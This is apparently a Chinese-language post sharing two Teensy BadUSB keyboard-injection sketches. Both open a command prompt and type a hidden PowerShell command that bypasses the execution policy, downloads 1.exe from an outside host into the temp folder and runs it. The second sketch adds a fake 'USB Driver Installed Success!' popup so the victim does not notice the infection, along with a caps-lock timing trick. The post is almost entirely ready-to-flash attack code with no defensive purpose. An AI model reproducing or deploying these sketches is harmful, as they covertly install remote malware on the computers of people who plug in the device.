Teensy BadUSB远程下载木马执行后自动退出,速度极快,用了一点小技巧

这个是一闪而过安装脚本

#define print Keyboard.println

void setup() { 
  win_press(KEY_R);
  print("cmd");//   
  press_once(KEY_ENTER);
  delay(500);
  print("powershell -windowstyle hidden -NoProfile -NonInteractive -ExecutionPolicy Bypass Import-Module BitsTransfer;Start-BitsTransfer http://lonelyrain.me/1.exe \"$env:%TEMP%\\1.exe\";%TEMP%\\1.exe;")
  press_once(KEY_ENTER);
}

void loop() {
}

void press_once(unsigned InputCommand)
{
  Keyboard.press(InputCommand);
  Keyboard.release(InputCommand);
  delay(500);
  }

void alt_press(unsigned InputCommand)
{
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  Keyboard.set_modifier( KEY_LEFT_ALT ); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now();
  }

void win_press(unsigned InputCommand)
{
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now(); 
  delay(3000);
}

伪造U盘驱动安装

#define TEENSY2
#ifdef TEENSY2
    #include<usb_private.h>
#endif
#define print Keyboard.println

void setup() {
  wait_for_drivers(2000);
  make_sure_capslock_is_off();
  win_press(KEY_R);
  print("cmd /k mode con:cols=48 lines=9");//   
  press_once(KEY_ENTER);
  delay(500);
  print("powershell -windowstyle hidden -NoProfile -NonInteractive -ExecutionPolicy Bypass Import-Module BitsTransfer;Start-BitsTransfer http://lonelyrain.me/1.exe \"$env:%TEMP%\\1.exe\";%TEMP%\\1.exe;$w=New-Object -ComObject WScript.Shell;$w.popup(\\\"USB Driver Installed Success!\\\",5,\\\"USB Driver Install\\\",65);");
  press_once(KEY_ENTER);
}

void loop() {
}

void press_once(unsigned InputCommand)
{
  Keyboard.press(InputCommand);
  Keyboard.release(InputCommand);
  delay(500);
  }

int ledkeys(void) {return int(keyboard_leds);}

  
bool is_caps_on(void) {return ((ledkeys() & 2) == 2) ? true : false;}

void wait_for_drivers(int sleep)
{
  bool CapsLockTrap = is_caps_on();
  while(CapsLockTrap == is_caps_on())
{
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    delay(sleep);
}
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    delay(sleep);
}

void make_sure_capslock_is_off(void)
{
if (is_caps_on())
{
delay(500);
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(200);
delay(700);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
delay(700);
}
}

void win_press(unsigned InputCommand)
{
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now(); 
  delay(3000);
}